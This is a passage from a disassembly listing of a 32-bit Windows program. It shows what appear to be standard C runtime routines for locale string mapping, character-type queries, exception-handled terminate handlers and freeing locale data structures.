		test	edx, edx
		jz	short loc_40C3F5
		movzx	esi, byte ptr [ebp+arg_1C]
		push	esi
		push	[ebp+arg_18]
		push	[ebp+arg_14]
		push	eax
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	ecx
		call	edx
		add	esp, 20h
		jmp	short loc_40C414
; ---------------------------------------------------------------------------

loc_40C3F5:				; CODE XREF: sub_40C335+8Cj
					; sub_40C335+92j ...
		push	[ebp+arg_18]
		push	[ebp+arg_14]
		push	[ebp+arg_1C]
		push	eax
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	ecx
		call	sub_40BFC7
		add	esp, 20h

loc_40C411:				; CODE XREF: sub_40C335+43j
					; sub_40C335+53j ...
		xor	eax, eax
		inc	eax

loc_40C414:				; CODE XREF: sub_40C335+BEj
		pop	edi
		pop	esi
		pop	ebx
		pop	ebp
		retn
sub_40C335	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40C419	proc near		; CODE XREF: sub_40B6DE:loc_40B712p
					; sub_40B818+22j ...

ms_exc		= CPPEH_RECORD ptr -18h

; FUNCTION CHUNK AT 0040C440 SIZE 00000012 BYTES

		push	8
		push	offset dword_422C70
		call	__SEH_prolog4
		call	sub_40595D
		mov	eax, [eax+78h]
		test	eax, eax
		jz	short loc_40C447
		and	[ebp+ms_exc.disabled], 0
		call	eax
		jmp	short loc_40C440
sub_40C419	endp

; ---------------------------------------------------------------------------
		xor	eax, eax
		inc	eax
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp-18h]
; START	OF FUNCTION CHUNK FOR sub_40C419

loc_40C440:				; CODE XREF: sub_40C419+1Ej
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh

loc_40C447:				; CODE XREF: sub_40C419+16j
		call	sub_41077D
		call	__SEH_epilog4
		retn
; END OF FUNCTION CHUNK	FOR sub_40C419

; =============== S U B	R O U T	I N E =======================================



sub_40C452	proc near		; CODE XREF: sub_40BA74+23p
		call	sub_40595D
		mov	eax, [eax+7Ch]
		test	eax, eax
		jz	short loc_40C460
		call	eax

loc_40C460:				; CODE XREF: sub_40C452+Aj
		jmp	sub_40C419
sub_40C452	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40C465	proc near		; CODE XREF: sub_404A26+1Cp
					; sub_404A26:loc_404A87p ...

ms_exc		= CPPEH_RECORD ptr -18h

		push	8
		push	offset dword_422C90
		call	__SEH_prolog4
		push	off_428F2C
		call	sub_405753
		pop	ecx
		test	eax, eax
		jz	short loc_40C497
		and	[ebp+ms_exc.disabled], 0
		call	eax
		jmp	short loc_40C490
; ---------------------------------------------------------------------------
		xor	eax, eax
		inc	eax
		retn
; ---------------------------------------------------------------------------
		mov	esp, [ebp+ms_exc.old_esp]

loc_40C490:				; CODE XREF: sub_40C465+22j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh

loc_40C497:				; CODE XREF: sub_40C465+1Aj
		jmp	sub_40C419
sub_40C465	endp


; =============== S U B	R O U T	I N E =======================================



sub_40C49C	proc near		; CODE XREF: sub_4080D9+33p
		push	offset sub_40C419
		call	sub_4056E7
		pop	ecx
		mov	off_428F2C, eax
		retn
sub_40C49C	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40C4B0	proc near		; CODE XREF: sub_404B2E+4Ap
					; sub_40B85C+77p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 4
		push	ebx
		push	ecx
		mov	eax, [ebp+arg_4]
		add	eax, 0Ch
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	ebp
		push	[ebp+arg_8]
		mov	ecx, [ebp+arg_8]
		mov	ebp, [ebp+var_4]
		call	sub_40F214
		push	esi
		push	edi
		call	eax
		pop	edi
		pop	esi
		mov	ebx, ebp
		pop	ebp
		mov	ecx, [ebp+arg_8]
		push	ebp
		mov	ebp, ebx
		cmp	ecx, 100h
		jnz	short loc_40C4EF
		mov	ecx, 2

loc_40C4EF:				; CODE XREF: sub_40C4B0+38j
		push	ecx
		call	sub_40F214
		pop	ebp
		pop	ecx
		pop	ebx
		leave
		retn	0Ch
sub_40C4B0	endp


; =============== S U B	R O U T	I N E =======================================



sub_40C4FC	proc near		; CODE XREF: sub_40C517+220p
					; sub_40C517+229p ...

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		test	eax, eax
		jz	short locret_40C516
		sub	eax, 8
		cmp	dword ptr [eax], 0DDDDh
		jnz	short locret_40C516
		push	eax
		call	sub_403B91
		pop	ecx

locret_40C516:				; CODE XREF: sub_40C4FC+6j
					; sub_40C4FC+11j
		retn
sub_40C4FC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40C517	proc near		; CODE XREF: sub_40C8B9+2Cp

var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h
arg_1C		= dword	ptr  24h

		push	ebp
		mov	ebp, esp
		sub	esp, 14h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		push	esi
		xor	ebx, ebx
		cmp	dword_428F30, ebx
		push	edi
		mov	esi, ecx
		jnz	short loc_40C56E
		push	ebx
		push	ebx
		xor	edi, edi
		inc	edi
		push	edi
		push	offset dword_41EC5C
		push	100h
		push	ebx
		call	ds:dword_41E128	; LCMapStringW
		test	eax, eax
		jz	short loc_40C559
		mov	dword_428F30, edi
		jmp	short loc_40C56E
; ---------------------------------------------------------------------------

loc_40C559:				; CODE XREF: sub_40C517+38j
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		cmp	eax, 78h
		jnz	short loc_40C56E
		mov	dword_428F30, 2

loc_40C56E:				; CODE XREF: sub_40C517+1Dj
					; sub_40C517+40j ...
		cmp	[ebp+arg_C], ebx
		jle	short loc_40C595
		mov	ecx, [ebp+arg_C]
		mov	eax, [ebp+arg_8]

loc_40C579:				; CODE XREF: sub_40C517+6Aj
		dec	ecx
		cmp	[eax], bl
		jz	short loc_40C586
		inc	eax
		cmp	ecx, ebx
		jnz	short loc_40C579
		or	ecx, 0FFFFFFFFh

loc_40C586:				; CODE XREF: sub_40C517+65j
		mov	eax, [ebp+arg_C]
		sub	eax, ecx
		dec	eax
		cmp	eax, [ebp+arg_C]
		jge	short loc_40C592
		inc	eax

loc_40C592:				; CODE XREF: sub_40C517+78j
		mov	[ebp+arg_C], eax

loc_40C595:				; CODE XREF: sub_40C517+5Aj
		mov	eax, dword_428F30
		cmp	eax, 2
		jz	loc_40C74E
		cmp	eax, ebx
		jz	loc_40C74E
		cmp	eax, 1
		jnz	loc_40C77F
		cmp	[ebp+arg_18], ebx
		mov	[ebp+var_8], ebx
		jnz	short loc_40C5C4
		mov	eax, [esi]
		mov	eax, [eax+4]
		mov	[ebp+arg_18], eax

loc_40C5C4:				; CODE XREF: sub_40C517+A3j
		mov	esi, ds:dword_41E0A0
		xor	eax, eax
		cmp	[ebp+arg_1C], ebx
		push	ebx
		push	ebx
		push	[ebp+arg_C]
		setnz	al
		push	[ebp+arg_8]
		lea	eax, ds:1[eax*8]
		push	eax
		push	[ebp+arg_18]
		call	esi	; MultiByteToWideChar
		mov	edi, eax
		cmp	edi, ebx
		jz	loc_40C77F
		jle	short loc_40C636
		push	0FFFFFFE0h
		xor	edx, edx
		pop	eax
		div	edi
		cmp	eax, 2
		jb	short loc_40C636
		lea	eax, [edi+edi+8]
		cmp	eax, 400h
		ja	short loc_40C61D
		call	sub_410A70
		mov	eax, esp
		cmp	eax, ebx
		jz	short loc_40C631
		mov	dword ptr [eax], 0CCCCh
		jmp	short loc_40C62E
; ---------------------------------------------------------------------------

loc_40C61D:				; CODE XREF: sub_40C517+F1j
		push	eax
		call	sub_403C6E
		cmp	eax, ebx
		pop	ecx
		jz	short loc_40C631
		mov	dword ptr [eax], 0DDDDh

loc_40C62E:				; CODE XREF: sub_40C517+104j
		add	eax, 8

loc_40C631:				; CODE XREF: sub_40C517+FCj
					; sub_40C517+10Fj
		mov	[ebp+var_C], eax
		jmp	short loc_40C639
; ---------------------------------------------------------------------------

loc_40C636:				; CODE XREF: sub_40C517+DAj
					; sub_40C517+E6j
		mov	[ebp+var_C], ebx

loc_40C639:				; CODE XREF: sub_40C517+11Dj
		cmp	[ebp+var_C], ebx
		jz	loc_40C77F
		push	edi
		push	[ebp+var_C]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	1
		push	[ebp+arg_18]
		call	esi	; MultiByteToWideChar
		test	eax, eax
		jz	loc_40C73D
		mov	esi, ds:dword_41E128
		push	ebx
		push	ebx
		push	edi
		push	[ebp+var_C]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	esi	; LCMapStringW
		mov	ecx, eax
		cmp	ecx, ebx
		mov	[ebp+var_8], ecx
		jz	loc_40C73D
		test	word ptr [ebp+arg_4], 400h
		jz	short loc_40C6AD
		cmp	[ebp+arg_14], ebx
		jz	loc_40C73D
		cmp	ecx, [ebp+arg_14]
		jg	loc_40C73D
		push	[ebp+arg_14]
		push	[ebp+arg_10]
		push	edi
		push	[ebp+var_C]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	esi	; LCMapStringW
		jmp	loc_40C73D
; ---------------------------------------------------------------------------

loc_40C6AD:				; CODE XREF: sub_40C517+16Bj
		cmp	ecx, ebx
		jle	short loc_40C6F6
		push	0FFFFFFE0h
		xor	edx, edx
		pop	eax
		div	ecx
		cmp	eax, 2
		jb	short loc_40C6F6
		lea	eax, [ecx+ecx+8]
		cmp	eax, 400h
		ja	short loc_40C6DE
		call	sub_410A70
		mov	esi, esp
		cmp	esi, ebx
		jz	short loc_40C73D
		mov	dword ptr [esi], 0CCCCh
		add	esi, 8
		jmp	short loc_40C6F8
; ---------------------------------------------------------------------------

loc_40C6DE:				; CODE XREF: sub_40C517+1AFj
		push	eax
		call	sub_403C6E
		cmp	eax, ebx
		pop	ecx
		jz	short loc_40C6F2
		mov	dword ptr [eax], 0DDDDh
		add	eax, 8

loc_40C6F2:				; CODE XREF: sub_40C517+1D0j
		mov	esi, eax
		jmp	short loc_40C6F8
; ---------------------------------------------------------------------------

loc_40C6F6:				; CODE XREF: sub_40C517+198j
					; sub_40C517+1A4j
		xor	esi, esi

loc_40C6F8:				; CODE XREF: sub_40C517+1C5j
					; sub_40C517+1DDj
		cmp	esi, ebx
		jz	short loc_40C73D
		push	[ebp+var_8]
		push	esi
		push	edi
		push	[ebp+var_C]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	ds:dword_41E128	; LCMapStringW
		test	eax, eax
		jz	short loc_40C736
		cmp	[ebp+arg_14], ebx
		push	ebx
		push	ebx
		jnz	short loc_40C71F
		push	ebx
		push	ebx
		jmp	short loc_40C725
; ---------------------------------------------------------------------------

loc_40C71F:				; CODE XREF: sub_40C517+202j
		push	[ebp+arg_14]
		push	[ebp+arg_10]

loc_40C725:				; CODE XREF: sub_40C517+206j
		push	[ebp+var_8]
		push	esi
		push	ebx
		push	[ebp+arg_18]
		call	ds:dword_41E134	; WideCharToMultiByte
		mov	[ebp+var_8], eax

loc_40C736:				; CODE XREF: sub_40C517+1FBj
		push	esi
		call	sub_40C4FC
		pop	ecx

loc_40C73D:				; CODE XREF: sub_40C517+13Ej
					; sub_40C517+15Fj ...
		push	[ebp+var_C]
		call	sub_40C4FC
		mov	eax, [ebp+var_8]
		pop	ecx
		jmp	loc_40C8A7
; ---------------------------------------------------------------------------

loc_40C74E:				; CODE XREF: sub_40C517+86j
					; sub_40C517+8Ej
		cmp	[ebp+arg_0], ebx
		mov	[ebp+var_C], ebx
		mov	[ebp+var_10], ebx
		jnz	short loc_40C761
		mov	eax, [esi]
		mov	eax, [eax+14h]
		mov	[ebp+arg_0], eax

loc_40C761:				; CODE XREF: sub_40C517+240j
		cmp	[ebp+arg_18], ebx
		jnz	short loc_40C76E
		mov	eax, [esi]
		mov	eax, [eax+4]
		mov	[ebp+arg_18], eax

loc_40C76E:				; CODE XREF: sub_40C517+24Dj
		push	[ebp+arg_0]
		call	sub_410870
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		mov	[ebp+var_14], eax
		jnz	short loc_40C786

loc_40C77F:				; CODE XREF: sub_40C517+97j
					; sub_40C517+D4j ...
		xor	eax, eax
		jmp	loc_40C8A7
; ---------------------------------------------------------------------------

loc_40C786:				; CODE XREF: sub_40C517+266j
		cmp	eax, [ebp+arg_18]
		jz	loc_40C86A
		push	ebx
		push	ebx
		lea	ecx, [ebp+arg_C]
		push	ecx
		push	[ebp+arg_8]
		push	eax
		push	[ebp+arg_18]
		call	sub_4108B7
		add	esp, 18h
		cmp	eax, ebx
		mov	[ebp+var_C], eax
		jz	short loc_40C77F
		mov	esi, ds:off_41E12C
		push	ebx
		push	ebx
		push	[ebp+arg_C]
		push	eax
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	esi ; sub_441FCC
		cmp	eax, ebx
		mov	[ebp+var_8], eax
		jnz	short loc_40C7CD

loc_40C7C6:				; CODE XREF: sub_40C517+2D0j
					; sub_40C517+2F9j
		xor	esi, esi
		jmp	loc_40C884
; ---------------------------------------------------------------------------

loc_40C7CD:				; CODE XREF: sub_40C517+2ADj
		jle	short loc_40C80C
		cmp	eax, 0FFFFFFE0h
		ja	short loc_40C80C
		add	eax, 8
		cmp	eax, 400h
		ja	short loc_40C7F4
		call	sub_410A70
		mov	edi, esp
		cmp	edi, ebx
		jz	short loc_40C7C6
		mov	dword ptr [edi], 0CCCCh
		add	edi, 8
		jmp	short loc_40C80E
; ---------------------------------------------------------------------------

loc_40C7F4:				; CODE XREF: sub_40C517+2C5j
		push	eax
		call	sub_403C6E
		cmp	eax, ebx
		pop	ecx
		jz	short loc_40C808
		mov	dword ptr [eax], 0DDDDh
		add	eax, 8

loc_40C808:				; CODE XREF: sub_40C517+2E6j
		mov	edi, eax
		jmp	short loc_40C80E
; ---------------------------------------------------------------------------

loc_40C80C:				; CODE XREF: sub_40C517:loc_40C7CDj
					; sub_40C517+2BBj
		xor	edi, edi

loc_40C80E:				; CODE XREF: sub_40C517+2DBj
					; sub_40C517+2F3j
		cmp	edi, ebx
		jz	short loc_40C7C6
		push	[ebp+var_8]
		push	ebx
		push	edi
		call	sub_408130
		add	esp, 0Ch
		push	[ebp+var_8]
		push	edi
		push	[ebp+arg_C]
		push	[ebp+var_C]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	esi ; sub_441FCC
		cmp	eax, ebx
		mov	[ebp+var_8], eax
		jnz	short loc_40C83C
		xor	esi, esi
		jmp	short loc_40C861
; ---------------------------------------------------------------------------

loc_40C83C:				; CODE XREF: sub_40C517+31Fj
		push	[ebp+arg_14]
		lea	eax, [ebp+var_8]
		push	[ebp+arg_10]
		push	eax
		push	edi
		push	[ebp+arg_18]
		push	[ebp+var_14]
		call	sub_4108B7
		mov	esi, eax
		mov	[ebp+var_10], esi
		add	esp, 18h
		neg	esi
		sbb	esi, esi
		and	esi, [ebp+var_8]

loc_40C861:				; CODE XREF: sub_40C517+323j
		push	edi
		call	sub_40C4FC
		pop	ecx
		jmp	short loc_40C884
; ---------------------------------------------------------------------------

loc_40C86A:				; CODE XREF: sub_40C517+272j
		push	[ebp+arg_14]
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	ds:off_41E12C
		mov	esi, eax

loc_40C884:				; CODE XREF: sub_40C517+2B1j
					; sub_40C517+351j
		cmp	[ebp+var_C], ebx
		jz	short loc_40C892
		push	[ebp+var_C]
		call	sub_403B91
		pop	ecx

loc_40C892:				; CODE XREF: sub_40C517+370j
		mov	eax, [ebp+var_10]
		cmp	eax, ebx
		jz	short loc_40C8A5
		cmp	[ebp+arg_10], eax
		jz	short loc_40C8A5
		push	eax
		call	sub_403B91
		pop	ecx

loc_40C8A5:				; CODE XREF: sub_40C517+380j
					; sub_40C517+385j
		mov	eax, esi

loc_40C8A7:				; CODE XREF: sub_40C517+232j
					; sub_40C517+26Aj
		lea	esp, [ebp-20h]
		pop	edi
		pop	esi
		pop	ebx
		mov	ecx, [ebp+var_4]
		xor	ecx, ebp
		call	sub_402C9E
		leave
		retn
sub_40C517	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40C8B9	proc near		; CODE XREF: sub_404DD6+B6p
					; sub_404DD6+DBp ...

var_10		= byte ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h
arg_1C		= dword	ptr  24h
arg_20		= dword	ptr  28h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	[ebp+arg_0]
		lea	ecx, [ebp+var_10]
		call	sub_402CAD
		push	[ebp+arg_20]
		lea	ecx, [ebp+var_10]
		push	[ebp+arg_1C]
		push	[ebp+arg_18]
		push	[ebp+arg_14]
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		call	sub_40C517
		add	esp, 20h
		cmp	[ebp+var_4], 0
		jz	short locret_40C8FA
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

locret_40C8FA:				; CODE XREF: sub_40C8B9+38j
		leave
		retn
sub_40C8B9	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40C8FC	proc near		; CODE XREF: sub_40CAB4+29p

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, dword_428F34
		push	ebx
		push	esi
		xor	ebx, ebx
		cmp	eax, ebx
		push	edi
		mov	edi, ecx
		jnz	short loc_40C955
		lea	eax, [ebp+var_8]
		push	eax
		xor	esi, esi
		inc	esi
		push	esi
		push	offset dword_41EC5C
		push	esi
		call	ds:dword_41E120	; GetStringTypeW
		test	eax, eax
		jz	short loc_40C93B
		mov	dword_428F34, esi
		jmp	short loc_40C96F
; ---------------------------------------------------------------------------

loc_40C93B:				; CODE XREF: sub_40C8FC+35j
		call	ds:dword_41E0EC	; RtlGetLastWin32Error
		cmp	eax, 78h
		jnz	short loc_40C950
		push	2
		pop	eax
		mov	dword_428F34, eax
		jmp	short loc_40C955
; ---------------------------------------------------------------------------

loc_40C950:				; CODE XREF: sub_40C8FC+48j
		mov	eax, dword_428F34

loc_40C955:				; CODE XREF: sub_40C8FC+1Dj
					; sub_40C8FC+52j
		cmp	eax, 2
		jz	loc_40CA2D
		cmp	eax, ebx
		jz	loc_40CA2D
		cmp	eax, 1
		jnz	loc_40CA57

loc_40C96F:				; CODE XREF: sub_40C8FC+3Dj
		cmp	[ebp+arg_10], ebx
		mov	[ebp+var_8], ebx
		jnz	short loc_40C97F
		mov	eax, [edi]
		mov	eax, [eax+4]
		mov	[ebp+arg_10], eax

loc_40C97F:				; CODE XREF: sub_40C8FC+79j
		mov	esi, ds:dword_41E0A0
		xor	eax, eax
		cmp	[ebp+arg_18], ebx
		push	ebx
		push	ebx
		push	[ebp+arg_8]
		setnz	al
		push	[ebp+arg_4]
		lea	eax, ds:1[eax*8]
		push	eax
		push	[ebp+arg_10]
		call	esi	; MultiByteToWideChar
		mov	edi, eax
		cmp	edi, ebx
		jz	loc_40CA57
		jle	short loc_40C9EA
		cmp	edi, 7FFFFFF0h
		ja	short loc_40C9EA
		lea	eax, [edi+edi+8]
		cmp	eax, 400h
		ja	short loc_40C9D4
		call	sub_410A70
		mov	eax, esp
		cmp	eax, ebx
		jz	short loc_40C9E8
		mov	dword ptr [eax], 0CCCCh
		jmp	short loc_40C9E5
; ---------------------------------------------------------------------------

loc_40C9D4:				; CODE XREF: sub_40C8FC+C3j
		push	eax
		call	sub_403C6E
		cmp	eax, ebx
		pop	ecx
		jz	short loc_40C9E8
		mov	dword ptr [eax], 0DDDDh

loc_40C9E5:				; CODE XREF: sub_40C8FC+D6j
		add	eax, 8

loc_40C9E8:				; CODE XREF: sub_40C8FC+CEj
					; sub_40C8FC+E1j
		mov	ebx, eax

loc_40C9EA:				; CODE XREF: sub_40C8FC+B0j
					; sub_40C8FC+B8j
		test	ebx, ebx
		jz	short loc_40CA57
		lea	eax, [edi+edi]
		push	eax
		push	0
		push	ebx
		call	sub_408130
		add	esp, 0Ch
		push	edi
		push	ebx
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	1
		push	[ebp+arg_10]
		call	esi	; MultiByteToWideChar
		test	eax, eax
		jz	short loc_40CA21
		push	[ebp+arg_C]
		push	eax
		push	ebx
		push	[ebp+arg_0]
		call	ds:dword_41E120	; GetStringTypeW
		mov	[ebp+var_8], eax

loc_40CA21:				; CODE XREF: sub_40C8FC+112j
		push	ebx
		call	sub_40C4FC
		mov	eax, [ebp+var_8]
		pop	ecx
		jmp	short loc_40CAA2
; ---------------------------------------------------------------------------

loc_40CA2D:				; CODE XREF: sub_40C8FC+5Cj
					; sub_40C8FC+64j
		xor	esi, esi
		cmp	[ebp+arg_14], ebx
		jnz	short loc_40CA3C
		mov	eax, [edi]
		mov	eax, [eax+14h]
		mov	[ebp+arg_14], eax

loc_40CA3C:				; CODE XREF: sub_40C8FC+136j
		cmp	[ebp+arg_10], ebx
		jnz	short loc_40CA49
		mov	eax, [edi]
		mov	eax, [eax+4]
		mov	[ebp+arg_10], eax

loc_40CA49:				; CODE XREF: sub_40C8FC+143j
		push	[ebp+arg_14]
		call	sub_410870
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jnz	short loc_40CA5B

loc_40CA57:				; CODE XREF: sub_40C8FC+6Dj
					; sub_40C8FC+AAj ...
		xor	eax, eax
		jmp	short loc_40CAA2
; ---------------------------------------------------------------------------

loc_40CA5B:				; CODE XREF: sub_40C8FC+159j
		cmp	eax, [ebp+arg_10]
		jz	short loc_40CA7E
		push	ebx
		push	ebx
		lea	ecx, [ebp+arg_8]
		push	ecx
		push	[ebp+arg_4]
		push	eax
		push	[ebp+arg_10]
		call	sub_4108B7
		mov	esi, eax
		add	esp, 18h
		cmp	esi, ebx
		jz	short loc_40CA57
		mov	[ebp+arg_4], esi

loc_40CA7E:				; CODE XREF: sub_40C8FC+162j
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		push	[ebp+arg_14]
		call	ds:off_41E124
		cmp	esi, ebx
		mov	edi, eax
		jz	short loc_40CAA0
		push	esi
		call	sub_403B91
		pop	ecx

loc_40CAA0:				; CODE XREF: sub_40C8FC+19Bj
		mov	eax, edi

loc_40CAA2:				; CODE XREF: sub_40C8FC+12Fj
					; sub_40C8FC+15Dj
		lea	esp, [ebp-14h]
		pop	edi
		pop	esi
		pop	ebx
		mov	ecx, [ebp+var_4]
		xor	ecx, ebp
		call	sub_402C9E
		leave
		retn
sub_40C8FC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40CAB4	proc near		; CODE XREF: sub_404DD6+96p
					; sub_40D004+83p

var_10		= byte ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h
arg_1C		= dword	ptr  24h

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	[ebp+arg_0]
		lea	ecx, [ebp+var_10]
		call	sub_402CAD
		push	[ebp+arg_1C]
		lea	ecx, [ebp+var_10]
		push	[ebp+arg_18]
		push	[ebp+arg_14]
		push	[ebp+arg_10]
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		call	sub_40C8FC
		add	esp, 1Ch
		cmp	[ebp+var_4], 0
		jz	short locret_40CAF2
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

locret_40CAF2:				; CODE XREF: sub_40CAB4+35j
		leave
		retn
sub_40CAB4	endp


; =============== S U B	R O U T	I N E =======================================



sub_40CAF4	proc near		; CODE XREF: sub_4053E1+E9p

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		test	esi, esi
		jz	loc_40CC82
		push	dword ptr [esi+4]
		call	sub_403B91
		push	dword ptr [esi+8]
		call	sub_403B91
		push	dword ptr [esi+0Ch]
		call	sub_403B91
		push	dword ptr [esi+10h]
		call	sub_403B91
		push	dword ptr [esi+14h]
		call	sub_403B91
		push	dword ptr [esi+18h]
		call	sub_403B91
		push	dword ptr [esi]
		call	sub_403B91
		push	dword ptr [esi+20h]
		call	sub_403B91
		push	dword ptr [esi+24h]
		call	sub_403B91
		push	dword ptr [esi+28h]
		call	sub_403B91
		push	dword ptr [esi+2Ch]
		call	sub_403B91
		push	dword ptr [esi+30h]
		call	sub_403B91
		push	dword ptr [esi+34h]
		call	sub_403B91
		push	dword ptr [esi+1Ch]
		call	sub_403B91
		push	dword ptr [esi+38h]
		call	sub_403B91
		push	dword ptr [esi+3Ch]
		call	sub_403B91
		add	esp, 40h
		push	dword ptr [esi+40h]
		call	sub_403B91
		push	dword ptr [esi+44h]
		call	sub_403B91
		push	dword ptr [esi+48h]
		call	sub_403B91
		push	dword ptr [esi+4Ch]
		call	sub_403B91
		push	dword ptr [esi+50h]
		call	sub_403B91
		push	dword ptr [esi+54h]
		call	sub_403B91
		push	dword ptr [esi+58h]
		call	sub_403B91
		push	dword ptr [esi+5Ch]
		call	sub_403B91
		push	dword ptr [esi+60h]
		call	sub_403B91
		push	dword ptr [esi+64h]
		call	sub_403B91
		push	dword ptr [esi+68h]
		call	sub_403B91
		push	dword ptr [esi+6Ch]
		call	sub_403B91
		push	dword ptr [esi+70h]
		call	sub_403B91
		push	dword ptr [esi+74h]
		call	sub_403B91
		push	dword ptr [esi+78h]
		call	sub_403B91
		push	dword ptr [esi+7Ch]
		call	sub_403B91
		add	esp, 40h
		push	dword ptr [esi+80h]
		call	sub_403B91
		push	dword ptr [esi+84h]
		call	sub_403B91
		push	dword ptr [esi+88h]
		call	sub_403B91
		push	dword ptr [esi+8Ch]
		call	sub_403B91
		push	dword ptr [esi+90h]
		call	sub_403B91
		push	dword ptr [esi+94h]
		call	sub_403B91
		push	dword ptr [esi+98h]
		call	sub_403B91
		push	dword ptr [esi+9Ch]
		call	sub_403B91
		push	dword ptr [esi+0A0h]
		call	sub_403B91
		push	dword ptr [esi+0A4h]
		call	sub_403B91
		push	dword ptr [esi+0A8h]
		call	sub_403B91
		add	esp, 2Ch

loc_40CC82:				; CODE XREF: sub_40CAF4+7j
		pop	esi
		retn
sub_40CAF4	endp


; =============== S U B	R O U T	I N E =======================================



sub_40CC84	proc near		; CODE XREF: sub_4053E1+64p

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		test	esi, esi
		jz	short loc_40CCC2
		mov	eax, [esi]
		cmp	eax, off_424F38
		jz	short loc_40CC9E
		push	eax
		call	sub_403B91
		pop	ecx

loc_40CC9E:				; CODE XREF: sub_40CC84+11j
		mov	eax, [esi+4]
		cmp	eax, off_424F3C
		jz	short loc_40CCB0
		push	eax
		call	sub_403B91
		pop	ecx

loc_40CCB0:				; CODE XREF: sub_40CC84+23j
		mov	esi, [esi+8]
		cmp	esi, off_424F40
		jz	short loc_40CCC2
		push	esi
		call	sub_403B91
		pop	ecx

loc_40CCC2:				; CODE XREF: sub_40CC84+7j
					; sub_40CC84+35j
		pop	esi
		retn
sub_40CC84	endp


; =============== S U B	R O U T	I N E =======================================



sub_40CCC4	proc near		; CODE XREF: sub_4053E1+43p

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		test	esi, esi
		jz	short loc_40CD4B
		mov	eax, [esi+0Ch]
		cmp	eax, off_424F44
		jz	short loc_40CCDF
		push	eax
		call	sub_403B91
		pop	ecx

loc_40CCDF:				; CODE XREF: sub_40CCC4+12j
		mov	eax, [esi+10h]
		cmp	eax, off_424F48
		jz	short loc_40CCF1
		push	eax
		call	sub_403B91
		pop	ecx

loc_40CCF1:				; CODE XREF: sub_40CCC4+24j
		mov	eax, [esi+14h]
		cmp	eax, off_424F4C
		jz	short loc_40CD03
		push	eax
		call	sub_403B91
		pop	ecx

loc_40CD03:				; CODE XREF: sub_40CCC4+36j
		mov	eax, [esi+18h]
		cmp	eax, off_424F50
		jz	short loc_40CD15
		push	eax
		call	sub_403B91
		pop	ecx

loc_40CD15:				; CODE XREF: sub_40CCC4+48j
		mov	eax, [esi+1Ch]
		cmp	eax, off_424F54
		jz	short loc_40CD27
		push	eax
		call	sub_403B91
		pop	ecx

loc_40CD27:				; CODE XREF: sub_40CCC4+5Aj
